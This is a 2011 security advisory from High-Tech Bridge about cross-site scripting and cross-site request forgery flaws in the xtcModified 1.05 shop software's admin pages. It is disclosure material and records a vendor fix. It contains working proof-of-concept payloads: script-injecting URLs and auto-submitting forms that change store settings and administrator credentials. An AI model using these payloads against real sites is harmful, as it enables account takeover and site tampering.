Total Tests:

Multiple Vulnerabilities in xtcModified

Advisory ID:HTB22863
Product:xtcModified
Vendor:xtcModified Team
Vulnerable Versions:1.05 and probably prior
Tested Version:1.05
Advisory Publication:February 17, 2011 [without technical details]
Vendor Notification:February 17, 2011
Public Disclosure:March 3, 2011
Vulnerability Type:Cross-Site Scripting [CWE-79]
Cross-Site Request Forgery [CWE-352]
Risk Level:Medium
CVSSv2 Base Scores:2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in xtcModified which could be exploited to perform cross-site scripting and cross-site request forgery attacks.

1) Cross-site scripting (XSS) vulnerabilities in xtcModified
1.1 The vulnerability exists due to input sanitation error in the "search" parameter in admin/customers.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation example:
http://host/admin/customers.php?search=1"><script>alert(document.cookie)</sc ript>
1.2 The vulnerability exists due to input sanitation error in the "status" parameter in admin/orders.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation example:
http://host/admin/orders.php?selected_box=customers&status=2"><script>alert( document.cookie)</script >

2) Cross-site request forgery (CSRF) vulnerabilities in xtcModified
2.1 The vulnerability exists due to insufficient validation of the request origin in admin/configuration.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change website configuration. Due to insufficient sanitation of input data in the "STORE_NAME" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation examples:
<form action="http://host/admin/configuration.php?gID=1&action=save" method="post" name="main">
<input type="hidden" name="STORE_NAME" value='My Store"><script>alert(document.cookie)</script>'>
<input type="hidden" name="STORE_OWNER" value="Owner">
<input type="hidden" name="STORE_OWNER_EMAIL_ADDRESS" value="email@example.com">
<input type="hidden" name="STORE_COUNTRY" value="81">
<input type="hidden" name="STORE_ZONE" value="80">
<input type="hidden" name="EXPECTED_PRODUCTS_SORT" value="desc">
<input type="hidden" name="EXPECTED_PRODUCTS_FIELD" value="date_expected">
<input type="hidden" name="DISPLAY_CART" value="true">
<input type="hidden" name="ADVANCED_SEARCH_DEFAULT_OPERATOR" value="and">
<input type="hidden" name="STORE_NAME_ADDRESS" value="address">
<input type="hidden" name="CURRENT_TEMPLATE" value="xtc5">
</form>
<script>
document.main.submit();
</script>

2.2 The vulnerability exists due to insufficient validation of the request origin in admin/customers.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change administrator`s credentials. Due to insufficient sanitation of input data in the "memo_title" and "memo_text" parameters it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.

Exploitation examples:
<form action="http://host/admin/customers.php?cID=1&action=update" method="post" name="main">
<input type="hidden" name="default_address_id" value="1">
<input type="hidden" name="customers_gender" value="m">
<input type="hidden" name="csID" value="">
<input type="hidden" name="customers_firstname" value="FirstName">
<input type="hidden" name="customers_lastname" value="LName">
<input type="hidden" name="customers_dob" value="01/01/2007">
<input type="hidden" name="customers_email_address" value="email@example.com">
<input type="hidden" name="entry_company" value="company">
<input type="hidden" name="entry_password" value="mypass">
<input type="hidden" name="memo_title" value='mmtitle"><script>alert(document.cookie)</script>'>
<input type="hidden" name="memo_text" value='txt"><script>alert(document.cookie)</script>'>
</form>
<script>
do cument.main.submit();
</script>

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to the most recent version

More information:
http://sourceforge.net/apps/trac/xtcmodified/changeset/1806/
http://sourceforge.net/apps/trac/xtcmodified/changeset/1811/


References:
[1] High-Tech Bridge Advisory HTB22863 - https://www.immuniweb.com/advisory/HTB22863 - Multiple vulnerabilities in xtcModified
[2] xtcModified - www.xtc-modified.org- xtcModified is an OpenSource onlineshop software.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential